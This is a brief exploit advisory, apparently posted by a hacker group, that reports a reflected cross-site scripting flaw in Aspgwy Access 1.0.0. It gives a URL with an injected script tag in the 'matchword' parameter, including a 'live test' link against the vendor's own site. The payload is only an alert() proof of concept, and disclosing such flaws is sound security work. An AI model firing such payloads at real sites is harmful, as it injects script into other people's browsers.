Aspgwy Access version 1.0.0 suffers from a cross site scripting vulnerability.
78db463e58965c529a5c4a6614d17333f3c19ce080b1a06db7603e8385da93ae
===========================================================
aspgwy_access_1.0.0 XSS Vulnerability
-----------------------------------------------------------
foun by :kurd-team
group : kurdish hackers team
contact : pshela@yahoo.com
site : kurdteam.org
-----------------------------------------------------------
------------------------script-----------------------------
-----------------------------------------------------------
script :aspgwy_access_1.0.0
site :http://www.aspgateway.com/
download : http://www.aspgateway.com/downloads/aspgwy_access_1.0.0.zip
-----------------------------------------------------------
Exploit:
--------
Exmple:
-------
/forum/search_results.asp?search_word=&matchword="><script>alert('kurd-team')</script>&brd=&PageNum=2
live teast :
http://www.aspgateway.com/forum/search_results.asp?search_word=&matchword="><script>alert('kurd-team')</script>&brd=&PageNum=2
-----------------------------------------------------------
Zryan_kurd ,root-SyS , all Member cold hackers team(cmg-team.com) , all kurdish hackers
-----------------------------------------------------------